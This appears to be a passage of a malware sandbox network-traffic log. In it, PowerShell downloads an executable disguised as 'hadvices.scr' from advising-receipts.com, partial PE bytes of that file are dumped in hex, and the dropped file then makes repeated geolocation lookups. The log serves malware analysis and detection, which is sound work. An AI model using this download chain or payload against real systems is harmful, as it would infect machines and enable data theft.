2024-05-01 13:17:07 UTC	1369	IN	Data Raw: 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 Data Ascii: ((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
2024-05-01 13:17:07 UTC	1369	IN	Data Raw: e8 fe 14 7f c1 29 5b c6 12 40 1a f3 e2 87 8a 2f f5 21 2f fd 3b 5b 11 65 1a 7e 12 5b ce 7f ed a5 7e af d0 01 45 14 50 01 45 14 50 06 6e b3 a1 d9 f8 8f 4a b8 b1 bd b6 82 f2 ce f6 37 b7 9e 09 93 cc 8e 58 df ef a3 0e 98 3d 2b f2 7f fe 0d bf fd 9a 63 fd 89 7f 6d df db bb e1 04 2b 24 7a 6f 83 7c 57 a1 49 a6 24 9f eb 3e c1 73 1e a3 3d 9e 7e b6 c6 3a fd 72 af 32 f8 7d fb 2e f8 43 e1 8f ed 0f f1 0b e2 86 91 67 73 6f e2 ff 00 8a 70 e9 96 fa fc f2 5c 3c 91 dc 26 9f 1c 91 5b 62 33 c2 11 1c 8e 3f 2f a5 00 7a 6d 06 8a 0f 4a 00 af 24 9c f6 dd 8e 07 a5 35 1f 7a 8f ba c0 75 38 a1 90 4b fc 3f 2b 0e 4f b5 7e 73 ff 00 c1 5e 7f e0 af 50 fe ce f6 77 df 0d be 1a df 47 73 e3 db 85 31 ea 3a 84 47 cc 8b 40 8c ff 00 39 8f a7 f0 75 35 c1 99 66 54 30 34 3d bd 73 ea b8 27 82 73 5e 2a Data Ascii: )[@/!/;[e~[~EPEPnJ7X=+cm+$zo\|WI$>s=~:r2}.Cgsop\<&[b3?/zmJ$5zu8K?+O~s^PwGs1:G@9u5fT04=s's^*

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49712	104.21.27.63	443	3532	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-01 13:17:09 UTC	159	OUT	GET /hsbc/hadvices.scr HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: advising-receipts.com
2024-05-01 13:17:09 UTC	580	IN	HTTP/1.1 200 OK Date: Wed, 01 May 2024 13:17:09 GMT Content-Type: application/octet-stream Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ygVnld%2Fs9Z6UjXMA8LWh9dOakkCDwEKBULi4mMOAWz0MnlkFCHZsqMWRdlEllL1xEavQSumUzsTFsAJsDM4fLliQdwBp5v2jZaUw8F5lp6QAYY6yV9tAyS9K%2B8bkHSGPqx4UWr7aY4Y%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87d00cd5ef6c3950-IAD alt-svc: h3=":443"; ma=86400
2024-05-01 13:17:09 UTC	789	IN	Data Raw: 33 31 65 61 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0c 0b 33 dd 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 da 0f 00 00 08 00 00 00 00 00 00 1e f8 0f 00 00 20 00 00 00 00 10 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 10 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 Data Ascii: 31eaMZ@!L!This program cannot be run in DOS mode.$PEL30 @ @@
2024-05-01 13:17:09 UTC	1369	IN	Data Raw: 00 cc 01 30 ff 88 01 18 ff 59 06 00 00 bf 08 00 00 7e 11 00 00 fd 22 00 00 20 00 09 00 0a 00 0d 00 04 08 00 00 04 04 00 00 07 04 00 00 09 04 00 00 0a 04 00 00 0c 04 00 00 11 04 00 00 00 00 00 00 2e 00 5f 21 00 5f 26 00 5f 2c 00 5f 2e 00 5f 3f 00 5f 5e 00 5f 7c 00 5f 7c 7c 00 5f 53 00 2b 00 41 00 41 41 00 41 44 56 00 41 45 00 41 45 58 00 41 48 00 41 49 ff ff 00 41 4e ff 00 41 4f 00 41 4f 45 00 41 4f 58 ff ff 00 41 50 49 00 41 53 50 00 41 54 52 00 41 55 ff ff 00 41 58 00 41 58 52 00 42 00 42 42 00 42 48 00 42 49 4d 00 42 56 41 00 42 56 44 00 43 00 43 43 ff ff 00 43 43 32 00 43 43 4b 00 43 45 4e 00 43 48 ff ff 00 43 48 32 00 43 4a 00 43 54 00 43 56 44 00 44 00 44 45 4e 00 44 48 00 44 49 4d 00 44 52 00 44 58 00 44 58 52 00 44 5a ff ff 00 44 5a 32 00 45 00 45 Data Ascii: 0Y~" ._!_&_,_._?_^_\|_\|\|_S+AAAADVAEAEXAHAIANAOAOEAOXAPIASPATRAUAXAXRBBBBHBIMBVABVDCCCCC2CCKCENCHCH2CJCTCVDDDENDHDIMDRDXDXRDZDZ2EE
2024-05-01 13:17:09 UTC	1369	IN	Data Raw: 33 31 30 36 00 33 31 30 37 00 33 31 30 38 00 33 31 30 39 00 33 31 30 41 00 33 31 30 42 00 33 31 30 43 00 33 31 30 44 00 33 31 30 45 00 33 31 30 46 00 33 31 31 30 00 33 31 31 31 00 33 31 31 32 00 33 31 31 33 00 33 31 31 34 00 33 31 31 35 00 33 31 31 36 00 33 31 31 37 00 33 31 31 38 00 33 31 31 39 00 33 31 31 41 00 33 31 31 42 00 33 31 31 43 00 33 31 31 44 00 33 31 31 45 00 33 31 31 46 00 33 31 32 30 00 33 31 32 31 00 33 31 32 32 00 33 31 32 33 00 33 31 32 34 00 33 31 32 35 00 33 31 32 36 00 33 31 32 37 00 33 31 32 38 00 33 31 32 39 00 00 00 00 00 21 00 26 00 2a 00 2b 00 2c 00 2d 00 2e 00 3f 00 5f 00 c7 02 c9 02 ca 02 cb 02 d9 02 00 30 05 31 06 31 07 31 08 31 09 31 0a 31 0b 31 0c 31 0d 31 0e 31 0f 31 10 31 11 31 12 31 13 31 14 31 15 31 16 31 17 31 18 31 19 Data Ascii: 3106310731083109310A310B310C310D310E310F3110311131123113311431153116311731183119311A311B311C311D311E311F3120312131223123312431253126312731283129!&*+,-.?_011111111111111111111
2024-05-01 13:17:09 UTC	1369	IN	Data Raw: 43 43 00 33 30 43 44 00 33 30 43 45 00 33 30 43 46 00 33 30 44 30 00 33 30 44 31 00 33 30 44 32 00 33 30 44 33 00 33 30 44 34 00 33 30 44 35 00 33 30 44 36 00 33 30 44 37 00 33 30 44 38 00 33 30 44 39 00 33 30 44 41 00 33 30 44 42 00 33 30 44 43 00 33 30 44 44 00 33 30 44 45 00 33 30 44 46 00 33 30 45 30 00 33 30 45 31 00 33 30 45 32 00 33 30 45 33 00 33 30 45 34 00 33 30 45 35 00 33 30 45 36 00 33 30 45 37 00 33 30 45 38 00 33 30 45 39 00 33 30 45 41 00 33 30 45 42 00 33 30 45 43 00 33 30 45 44 00 33 30 45 45 00 33 30 45 46 00 33 30 46 30 00 33 30 46 31 00 33 30 46 32 00 33 30 46 33 00 33 30 46 34 00 33 30 46 35 00 33 30 46 36 00 33 30 46 37 00 33 30 46 38 00 33 30 46 39 00 33 30 46 41 00 33 30 46 42 00 33 30 46 43 00 33 30 46 44 00 33 30 46 45 00 00 00 Data Ascii: CC30CD30CE30CF30D030D130D230D330D430D530D630D730D830D930DA30DB30DC30DD30DE30DF30E030E130E230E330E430E530E630E730E830E930EA30EB30EC30ED30EE30EF30F030F130F230F330F430F530F630F730F830F930FA30FB30FC30FD30FE
2024-05-01 13:17:09 UTC	1369	IN	Data Raw: 00 4e 41 4f 00 4e 45 00 4e 45 49 00 4e 45 4e 00 4e 45 4e 47 00 4e 49 00 4e 49 41 4e 00 4e 49 41 4e 47 00 4e 49 41 4f 00 4e 49 45 00 4e 49 4e 00 4e 49 4e 47 00 4e 49 55 00 4e 4f 4e 47 00 4e 4f 55 00 4e 55 00 4e 55 41 4e 00 4e 55 45 00 4e 55 4f 00 4e 56 00 4f 00 4f 55 00 50 41 00 50 41 49 00 50 41 4e 00 50 41 4e 47 00 50 41 4f 00 50 45 49 00 50 45 4e 00 50 45 4e 47 00 50 49 00 50 49 41 4e 00 50 49 41 4f 00 50 49 45 00 50 49 4e 00 50 49 4e 47 00 50 4f 00 50 4f 55 00 50 55 00 51 49 00 51 49 41 00 51 49 41 4e 00 51 49 41 4e 47 00 51 49 41 4f 00 51 49 45 00 51 49 4e 00 51 49 4e 47 00 51 49 4f 4e 47 00 51 49 55 00 51 55 00 51 55 41 4e 00 51 55 45 00 51 55 4e 00 52 41 4e 00 52 41 4e 47 00 52 41 4f 00 52 45 00 52 45 4e 00 52 45 4e 47 00 52 49 00 52 4f 4e 47 00 52 Data Ascii: NAONENEINENNENGNINIANNIANGNIAONIENINNINGNIUNONGNOUNUNUANNUENUONVOOUPAPAIPANPANGPAOPEIPENPENGPIPIANPIAOPIEPINPINGPOPOUPUQIQIAQIANQIANGQIAOQIEQINQINGQIONGQIUQUQUANQUEQUNRANRANGRAORERENRENGRIRONGR
2024-05-01 13:17:09 UTC	1369	IN	Data Raw: 01 03 01 04 01 05 01 06 01 07 01 08 01 09 01 0a 01 0b 01 0c 01 0d 01 0e 01 0f 01 10 01 11 01 12 01 13 01 14 01 15 01 16 01 17 01 18 01 19 01 1a 01 1b 01 1c 01 1d 01 1e 01 1f 01 20 01 21 01 22 01 23 01 24 01 25 01 26 01 27 01 28 01 29 01 2a 01 2b 01 2c 01 2d 01 2e 01 2f 01 30 01 31 01 32 01 33 01 34 01 35 01 36 01 37 01 38 01 39 01 3a 01 3b 01 3c 01 3d 01 3e 01 3f 01 40 01 41 01 42 01 43 01 44 01 45 01 46 01 47 01 48 01 49 01 4a 01 4b 01 4c 01 4d 01 4e 01 4f 01 50 01 51 01 52 01 53 01 54 01 55 01 56 01 57 01 58 01 59 01 5a 01 5b 01 5c 01 5d 01 5e 01 5f 01 60 01 61 01 62 01 63 01 64 01 65 01 66 01 67 01 68 01 69 01 6a 01 6b 01 6c 01 6d 01 6e 01 6f 01 70 01 71 01 72 01 73 01 74 01 75 01 76 01 77 01 78 01 79 01 7a 01 7b 01 7c 01 7d 01 7e 01 7f 01 80 01 81 01 Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~
2024-05-01 13:17:09 UTC	1369	IN	Data Raw: 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 Data Ascii:
2024-05-01 13:17:09 UTC	1369	IN	Data Raw: ff ff ff d8 ff ff ff e0 ff ff ff e8 ff ff ff f0 ff ff ff f8 ff ff ff 00 00 00 00 7c 7d 00 00 7c 79 00 00 7c 75 00 00 7c 71 00 00 7c 6d 00 00 7c 69 00 00 7c 65 00 00 7c 61 00 00 7c 5d 00 00 7c 59 00 00 7c 55 00 00 7c 51 00 00 7c 4d 00 00 7c 49 00 00 7c 45 00 00 7c 41 00 00 7c 3e 00 00 7c 3c 00 00 7c 3a 00 00 7c 38 00 00 7c 36 00 00 7c 34 00 00 7c 32 00 00 7c 30 00 00 7c 2e 00 00 7c 2c 00 00 7c 2a 00 00 7c 28 00 00 7c 26 00 00 7c 24 00 00 7c 22 00 00 7c 20 00 00 fc 1e 00 00 fc 1d 00 00 fc 1c 00 00 fc 1b 00 00 fc 1a 00 00 fc 19 00 00 fc 18 00 00 fc 17 00 00 fc 16 00 00 fc 15 00 00 fc 14 00 00 fc 13 00 00 fc 12 00 00 fc 11 00 00 fc 10 00 00 fc 0f 00 00 3c 0f 00 00 bc 0e 00 00 3c 0e 00 00 bc 0d 00 00 3c 0d 00 00 bc 0c 00 00 3c 0c 00 00 bc 0b 00 00 3c 0b 00 00 Data Ascii: \|}\|y\|u\|q\|m\|i\|e\|a\|]\|Y\|U\|Q\|M\|I\|E\|A\|>\|<\|:\|8\|6\|4\|2\|0\|.\|,\|*\|(\|&\|$\|"\| <<<<<
2024-05-01 13:17:09 UTC	1369	IN	Data Raw: 00 00 58 00 00 00 48 00 00 00 78 00 00 00 68 00 00 00 18 00 00 00 08 00 00 00 38 00 00 00 28 00 00 00 d8 00 00 00 c8 00 00 00 f8 00 00 00 e8 00 00 00 98 00 00 00 88 00 00 00 b8 00 00 00 a8 00 00 00 60 05 00 00 20 05 00 00 e0 05 00 00 a0 05 00 00 60 04 00 00 20 04 00 00 e0 04 00 00 a0 04 00 00 60 07 00 00 20 07 00 00 e0 07 00 00 a0 07 00 00 60 06 00 00 20 06 00 00 e0 06 00 00 a0 06 00 00 b0 02 00 00 90 02 00 00 f0 02 00 00 d0 02 00 00 30 02 00 00 10 02 00 00 70 02 00 00 50 02 00 00 b0 03 00 00 90 03 00 00 f0 03 00 00 d0 03 00 00 30 03 00 00 10 03 00 00 70 03 00 00 50 03 00 00 02 00 00 00 03 00 00 00 05 00 00 00 07 00 00 00 0b 00 00 00 0d 00 00 00 11 00 00 00 13 00 00 00 17 00 00 00 1d 00 00 00 1f 00 00 00 25 00 00 00 00 00 00 00 04 00 00 00 02 00 00 00 03 Data Ascii: XHxh8(` ` ` ` 0pP0pP%
2024-05-01 13:17:09 UTC	1045	IN	Data Raw: 6f 98 00 00 06 2d 0f 02 7b 94 00 00 04 6f 9a 00 00 06 14 fe 01 2a 16 2a ae 02 7b 94 00 00 04 2c 21 02 7b 94 00 00 04 6f 9a 00 00 06 2d 12 02 7b 94 00 00 04 6f 98 00 00 06 14 fe 01 16 fe 01 2a 17 2a 16 2a 6e 02 7b 94 00 00 04 2d 02 14 2a 02 7b 94 00 00 04 28 81 00 00 06 6f a0 00 00 06 2a ea 02 6f 9c 00 00 06 02 6f 9c 00 00 06 6f 9c 00 00 06 6f 98 00 00 06 33 11 02 6f 9c 00 00 06 6f 9c 00 00 06 6f 9a 00 00 06 2a 02 6f 9c 00 00 06 6f 9c 00 00 06 6f 98 00 00 06 2a 5e 02 03 6f 98 00 00 06 33 07 03 6f 9a 00 00 06 2a 03 6f 98 00 00 06 2a 46 02 2c 0c 02 6f 9e 00 00 06 2d 02 16 2a 17 2a 16 2a 3a 02 2c 0a 02 03 17 fe 01 6f 9f 00 00 06 2a 52 2b 08 02 6f 98 00 00 06 10 00 02 6f 98 00 00 06 2d f0 02 2a 52 2b 08 03 6f 9c 00 00 06 10 01 03 6f 9c 00 00 06 2d f0 03 2a 22 Data Ascii: o-{o{,!{o-{on{-{(ooooo3oooooo^o3ooF,o-*:,oR+oo-R+oo-"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49725	23.210.0.138	443	5280	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-01 13:17:22 UTC	475	OUT	GET /onboarding/smskillreader.txt HTTP/1.1 Host: armmf.adobe.com Connection: keep-alive Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br If-None-Match: "78-5faa31cce96da" If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
2024-05-01 13:17:22 UTC	198	IN	HTTP/1.1 304 Not Modified Content-Type: text/plain; charset=UTF-8 Last-Modified: Mon, 01 May 2023 15:02:33 GMT ETag: "78-5faa31cce96da" Date: Wed, 01 May 2024 13:17:22 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49731	104.21.67.152	443	5648	C:\Windows\Temp\hadvices.scr

Timestamp	Bytes transferred	Direction	Data
2024-05-01 13:17:27 UTC	85	OUT	GET /xml/149.18.24.96 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-05-01 13:17:27 UTC	693	IN	HTTP/1.1 200 OK Date: Wed, 01 May 2024 13:17:27 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: MISS Last-Modified: Wed, 01 May 2024 13:17:27 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=28IlE3E3i4qT8WYjcEz4zVCiY7VnQehwPMFEWmmIqk9cfR4z8%2FaqpckfPw7%2FNnhLiVGENIwPPAjPzTAJPUSEsqNDgcgtqynKyrvOEarfrLFt8J1Kzcv2axAnwjj4uKfQhiEM7a4z"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87d00d44f8cf6908-IAD alt-svc: h3=":443"; ma=86400
2024-05-01 13:17:27 UTC	341	IN	Data Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 Data Ascii: 14e<Response><IP>149.18.24.96</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
2024-05-01 13:17:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49732	104.21.67.152	443	5648	C:\Windows\Temp\hadvices.scr

Timestamp	Bytes transferred	Direction	Data
2024-05-01 13:17:28 UTC	61	OUT	GET /xml/149.18.24.96 HTTP/1.1 Host: reallyfreegeoip.org
2024-05-01 13:17:29 UTC	710	IN	HTTP/1.1 200 OK Date: Wed, 01 May 2024 13:17:29 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 2 Last-Modified: Wed, 01 May 2024 13:17:27 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yUchQrUyB8l6Qw6izoubmS%2BbIahsTPa0DNjGPXyLM%2FmusPhmh4kM0t5P8lDXoGRj5I9ya%2BdJnYS9lbEO1x2m77y2mn6SsKKOT7XtkgsVt6A%2B%2Fp8JsBMot1oo%2F%2FlSZOKaat728Itv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87d00d510fc15b6b-IAD alt-svc: h3=":443"; ma=86400
2024-05-01 13:17:29 UTC	341	IN	Data Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 Data Ascii: 14e<Response><IP>149.18.24.96</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
2024-05-01 13:17:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49734	104.21.67.152	443	5648	C:\Windows\Temp\hadvices.scr

Timestamp	Bytes transferred	Direction	Data
2024-05-01 13:17:29 UTC	85	OUT	GET /xml/149.18.24.96 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-05-01 13:17:30 UTC	689	IN	HTTP/1.1 200 OK Date: Wed, 01 May 2024 13:17:30 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: MISS Last-Modified: Wed, 01 May 2024 13:17:30 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UGwlt9PxfAVdY8GY3Bg9gTFATm9B4JdWjmJNP1AVxrrmw8grPiYCVQOu7A6U8V0bWDF52uKMs4t1lnBCzXkO0CK1b08l0McmMdRe4iVn2OdREAH77UUsTps6UvXULBZLZs2y1sws"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87d00d567b1413c9-IAD alt-svc: h3=":443"; ma=86400
2024-05-01 13:17:30 UTC	341	IN	Data Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 Data Ascii: 14e<Response><IP>149.18.24.96</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
2024-05-01 13:17:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49736	104.21.67.152	443	5648	C:\Windows\Temp\hadvices.scr

Timestamp	Bytes transferred	Direction	Data
2024-05-01 13:17:30 UTC	61	OUT	GET /xml/149.18.24.96 HTTP/1.1 Host: reallyfreegeoip.org
2024-05-01 13:17:31 UTC	706	IN	HTTP/1.1 200 OK Date: Wed, 01 May 2024 13:17:31 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 4 Last-Modified: Wed, 01 May 2024 13:17:27 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wCqDFtmJV0t8ZSBYUm54suGzEdSTbBgfoCTQxp7d5k4tn0qihIckQam015o0DWKjAia%2BsJusEZc6oOfHmKU3HSXy7VLf3DBzB0tBx1m%2F2YfdZLfxtGlpap57Rxv3SEMyTU%2BU%2B%2BWJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87d00d5d69ea5944-IAD alt-svc: h3=":443"; ma=86400
2024-05-01 13:17:31 UTC	341	IN	Data Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 Data Ascii: 14e<Response><IP>149.18.24.96</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
